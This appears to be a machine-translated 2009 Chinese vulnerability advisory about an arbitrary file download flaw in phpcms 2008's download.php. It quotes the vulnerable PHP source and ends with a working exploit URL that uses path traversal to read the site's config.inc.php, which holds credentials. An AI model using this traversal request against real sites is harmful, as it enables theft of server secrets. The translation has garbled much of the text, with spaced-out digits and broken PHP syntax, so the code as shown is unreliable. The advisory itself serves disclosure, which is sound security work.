phpcms 2 0 0 8 arbitrary download vulnerability-vulnerability warning-the black bar safety net

2009-10-20T00:00:00
ID MYHACK58:62200925075
Type myhack58
Reporter 佚名
Modified 2009-10-20T00:00:00

Description

Author:Dr. 漏洞 文件 download.php

<? php require dirname(FILE).'/ include/common.inc.php';

the $a sub K = phpcms_auth($a sub K, 'DECODE', BECAUSE); //note!! if(empty($a sub K)) showmessage($LANG['illegal_parameters']); parse_str($a sub K);

if(isset($i)) $downid = intval($i); if(! isset($m)) showmessage($LANG['illegal_parameters']); if(empty($f)) showmessage('address failure'); if(!$ i || $m<0) showmessage($LANG['illegal_parameters']); if(! isset($t)) showmessage($LANG['illegal_parameters']); if(! isset($ip)) showmessage($LANG['illegal_parameters']); $starttime = intval($t);

$fileurl = trim($f); if(!$ downid || empty($fileurl) || ! preg_match("/[0-9]{1 0}/", $starttime) || ! preg_match("/[0-9]{1,3}\. [0-9]{1,3}\. [0-9]{1,3}\. [0-9]{1,3}/", $ip) || $ip != IP) showmessage($LANG['illegal_parameters']);

$endtime = TIME - $starttime; if($endtime > 3 6 0 0) showmessage('address failure'); if($m) $fileurl = trim($s). trim($fileurl);

if(strpos($fileurl, '://'))//remote file { header("Location: $fileurl"); } else//local file { if($d == 0) { header("Location: ". SITE_URL.$ fileurl); } else { $fileurl = file_exists($fileurl) ? stripslashes($fileurl) : PHPCMS_ROOT.$ fileurl;//here may be for the physical path $filename = basename($fileurl); if(preg_match("/^([\s\S]?) ([\x81-\xfe][\x40-\xfe])([\s\S]?)/", $fileurl))//process Chinese documents { $filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl)); $filename = urldecode(basename($filename)); } file_down($fileurl, $filename); } } ?& gt;

function file_down($filepath, $filename = ") { if(!$ filename) $filename = basename($filepath); if(is_ie()) $filename = rawurlencode($filename); $filetype = fileext($filename); $filesize = sprintf("%u", filesize($filepath)); if(ob_get_length() !== false) @ob_end_clean(); header('Pragma: public'); header('Last-Modified: '. gmdate('D, d M Y H:i:s') . 'GMT'); header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: pre-check=0, post-check=0, max-age=0'); header('Content-Transfer-Encoding: binary'); header('Content-Encoding: none'); header('Content-type: '.$ filetype); header('Content-Disposition: attachment; filename="'.$ filename.'"'); header('Content-length: '.$ filesize); readfile($filepath); exit;

In fact,$i,$m,$f,$ip, etc. are all the address bar of the parameter is not filtered(in the down. php can be seen)by parse_str($a sub K)obtained after,also, because the$a sub K is the phpcms_auth($a sub K, 'DECODE', BECAUSE)after decryption in order to get the parameters,but my local test construct$a sub K variable to the encrypted value of unsuccessful change to the method,the$a sub K, is configured to non-existent parameter then the following$i,$m,$f,$ip to me directly from the address bar added! The test is as follows:

h t t p://www.xxxx.cn/download.php?a_k=Jh5zIw==&i=2 0&m=2&f=../include/config. inc. php&t=2 2 3 3 5 7 7 3 1 3&ip=119.123.178.19&s=m/&d=1